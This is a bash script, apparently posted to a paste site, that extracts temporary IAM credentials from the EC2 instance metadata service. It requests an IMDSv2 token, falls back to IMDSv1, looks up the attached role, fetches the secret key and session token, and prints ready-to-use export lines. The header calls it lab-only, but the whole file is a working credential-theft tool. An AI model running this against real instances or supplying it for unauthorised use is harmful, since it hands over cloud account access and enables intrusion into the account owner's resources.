orenma

Untitled

Jul 19th, 2025
  1. #!/bin/bash
  2.  
  3. # Script to extract IAM role credentials from EC2 metadata service
  4. # For security testing/lab environments only
  5.  
  6. echo "==== IAM Credential Extractor (Lab Use Only) ===="
  7. echo ""
  8.  
# Probe whether the instance metadata endpoint answers at all.
#
# Outputs:   progress and diagnosis messages on stdout
# Returns:   0 when the probe command succeeds within 2 seconds, 1 otherwise
#
# NOTE(review): curl is run without --fail, so it exits 0 for any HTTP
# response, including the 401 that an IMDSv2-only endpoint gives an
# unauthenticated GET. Reason 2 in the failure text therefore does not
# normally lead to this branch; a refused or timed-out connection does.
check_metadata_access() {
    printf '%s\n' "[*] Checking metadata service accessibility..."

    # Guard clause: report the failure reasons and bail out early.
    if ! timeout 2 curl -s http://169.254.169.254/ > /dev/null 2>&1; then
        cat <<'EOF'
[-] Metadata service is NOT accessible
    This could be because:
    1. Container is blocking access (--add-host redirects)
    2. IMDSv2 is enforced and needs token
    3. Network isolation
EOF
        return 1
    fi

    printf '%s\n' "[+] Metadata service is accessible"
    return 0
}
  26.  
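# Request an IMDSv2 session token and store it in the global TOKEN.
#
# Globals:   TOKEN (written) - the session token, or empty on failure
# Outputs:   progress messages on stdout; the token value is never printed
# Returns:   0 when a token was obtained, 1 otherwise
get_token() {
    echo "[*] Getting IMDSv2 token..."

    # --fail: an HTTP error status makes curl exit non-zero instead of handing
    #   back the error body, which would otherwise be stored as the "token" and
    #   keep the caller from ever taking its IMDSv1 branch.
    # --max-time: bound the request so an unanswered PUT cannot hang the script.
    # 21600 seconds is the longest session lifetime IMDSv2 accepts; this script
    # only needs the token for the two requests that follow.
    TOKEN=$(curl -s --fail --max-time 2 -X PUT "http://169.254.169.254/latest/api/token" \
        -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null) || TOKEN=""

    if [ -z "$TOKEN" ]; then
        echo "[-] Failed to get IMDSv2 token"
        echo "    Trying IMDSv1 fallback..."
        return 1
    fi

    # Report the length only: token material does not belong in terminal
    # scrollback or captured logs.
    echo "[+] Got IMDSv2 token (${#TOKEN} characters, value not shown)"
    return 0
}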
  42.  
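# Look up the name of the IAM role attached to the instance and store it in
# the global ROLE_NAME.
#
# Globals:   TOKEN (read when $1 is "true"), ROLE_NAME (written)
# Arguments: $1 - "true" to send the IMDSv2 token header, anything else for
#                 an unauthenticated (IMDSv1-style) request
# Outputs:   progress messages on stdout
# Returns:   0 when a role name was returned, 1 otherwise
get_role_name() {
    local use_token=$1
    local -a auth_header=()
    echo "[*] Getting IAM role name..."

    if [ "$use_token" = "true" ]; then
        auth_header=(-H "X-aws-ec2-metadata-token: $TOKEN")
    fi

    # --fail: without it the body of an error response (for example the 404
    #   returned when no role is attached, or a 401 for a missing token) would
    #   be stored and reported as the role name.
    # --max-time: bound the request so it cannot hang the script.
    ROLE_NAME=$(curl -s --fail --max-time 2 "${auth_header[@]}" \
        http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null) || ROLE_NAME=""

    if [ -z "$ROLE_NAME" ]; then
        echo "[-] No IAM role found attached to instance"
        return 1
    fi

    echo "[+] Found IAM role: $ROLE_NAME"
    return 0
}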
  64.  
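# Fetch the temporary credential document for ROLE_NAME into the global CREDS
# and print it.
#
# Globals:   TOKEN (read when $1 is "true"), ROLE_NAME (read), CREDS (written)
# Arguments: $1 - "true" to send the IMDSv2 token header, anything else for
#                 an unauthenticated (IMDSv1-style) request
# Outputs:   progress messages and the credential document on stdout. The
#            document contains live secrets, so anything that captures stdout
#            (terminal scrollback, CI logs) ends up holding them.
# Returns:   0 when a document was retrieved, 1 otherwise
get_credentials() {
    local use_token=$1
    local -a auth_header=()
    # Characters IAM permits in a role name.
    local -r role_name_re='^[A-Za-z0-9+=,.@_-]+$'
    echo "[*] Getting IAM credentials for role: $ROLE_NAME"

    # ROLE_NAME comes from a network response and is placed into a URL.
    # Refuse an empty value (which would request the role listing instead of
    # credentials) and anything that is not a well-formed role name.
    if [[ ! "$ROLE_NAME" =~ $role_name_re ]]; then
        CREDS=""
        echo "[-] Failed to get credentials"
        return 1
    fi

    if [ "$use_token" = "true" ]; then
        auth_header=(-H "X-aws-ec2-metadata-token: $TOKEN")
    fi

    # --fail replaces the former check for the substring "404" in the body:
    # that check missed every other error status and rejected valid documents
    # whose key or token happened to contain "404".
    CREDS=$(curl -s --fail --max-time 2 "${auth_header[@]}" \
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/${ROLE_NAME}" 2>/dev/null) || CREDS=""

    if [ -z "$CREDS" ]; then
        echo "[-] Failed to get credentials"
        return 1
    fi

    echo "[+] Successfully retrieved credentials!"
    echo ""
    echo "==== IAM Credentials ===="
    # Pretty-print when jq is available, otherwise show the raw document.
    printf '%s\n' "$CREDS" | jq . 2>/dev/null || printf '%s\n' "$CREDS"
    return 0
}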
  89.  
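# Parse the credential document in CREDS and print matching `export` lines.
#
# Globals:   CREDS (read); ACCESS_KEY, SECRET_KEY, SESSION_TOKEN (written)
# Outputs:   on success, three `export AWS_*` lines on stdout. These carry the
#            live secret key and session token in clear text.
# Returns:   0 when CREDS is empty (nothing to do) or all three fields were
#            found, 1 when the document lacks any of them
export_credentials() {
    [ -n "$CREDS" ] || return 0

    echo ""
    echo "[*] Exporting credentials as environment variables..."

    # jq is tried first; the grep expression is the fallback when jq is missing
    # or cannot parse the document. "// empty" matters: plain `jq -r .Field`
    # prints the literal string "null" (with exit status 0) for an absent
    # field, which would pass the non-empty checks below and be printed as if
    # it were a credential.
    ACCESS_KEY=$(printf '%s\n' "$CREDS" | jq -r '.AccessKeyId // empty' 2>/dev/null || printf '%s\n' "$CREDS" | grep -oP '"AccessKeyId"\s*:\s*"\K[^"]+')
    SECRET_KEY=$(printf '%s\n' "$CREDS" | jq -r '.SecretAccessKey // empty' 2>/dev/null || printf '%s\n' "$CREDS" | grep -oP '"SecretAccessKey"\s*:\s*"\K[^"]+')
    SESSION_TOKEN=$(printf '%s\n' "$CREDS" | jq -r '.Token // empty' 2>/dev/null || printf '%s\n' "$CREDS" | grep -oP '"Token"\s*:\s*"\K[^"]+')

    if [ -z "$ACCESS_KEY" ] || [ -z "$SECRET_KEY" ] || [ -z "$SESSION_TOKEN" ]; then
        # Say so instead of ending silently after the "Exporting" line.
        echo "[-] Credential document is missing AccessKeyId, SecretAccessKey or Token"
        return 1
    fi

    echo ""
    echo "# Add these to your environment:"
    echo "export AWS_ACCESS_KEY_ID=\"$ACCESS_KEY\""
    echo "export AWS_SECRET_ACCESS_KEY=\"$SECRET_KEY\""
    echo "export AWS_SESSION_TOKEN=\"$SESSION_TOKEN\""
    echo ""
    echo "[+] You can now use AWS CLI with these credentials!"
}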
  112.  
# Entry point: probe the metadata endpoint, then walk token -> role name ->
# credentials -> export lines, using IMDSv2 when a token can be obtained and
# unauthenticated requests otherwise.
#
# Exits with status 1 when the endpoint probe fails. A failure in a later step
# stops the chain but is not reflected in the exit status.
#
# NOTE(review): the troubleshooting text blames Docker --add-host flags.
# --add-host writes /etc/hosts entries, which affect name lookups; it likely
# has no effect on requests to the literal IP used here. Confirm before
# relying on it as a way to keep containers away from the metadata service.
main() {
    if ! check_metadata_access; then
        cat <<'EOF'

==== Troubleshooting ====
If running in Docker, make sure you DON'T have these flags:
  --add-host=169.254.169.254:127.0.0.1
  --add-host=metadata.ec2.internal:127.0.0.1

These redirect metadata service to localhost!
EOF
        exit 1
    fi

    # Pick the request mode once, then run a single retrieval chain.
    local imds_v2="true"
    if ! get_token; then
        echo "[*] Falling back to IMDSv1..."
        imds_v2="false"
    fi

    if get_role_name "$imds_v2" && get_credentials "$imds_v2"; then
        export_credentials
    fi
}
  140.  
  141. # Run main function
  142. main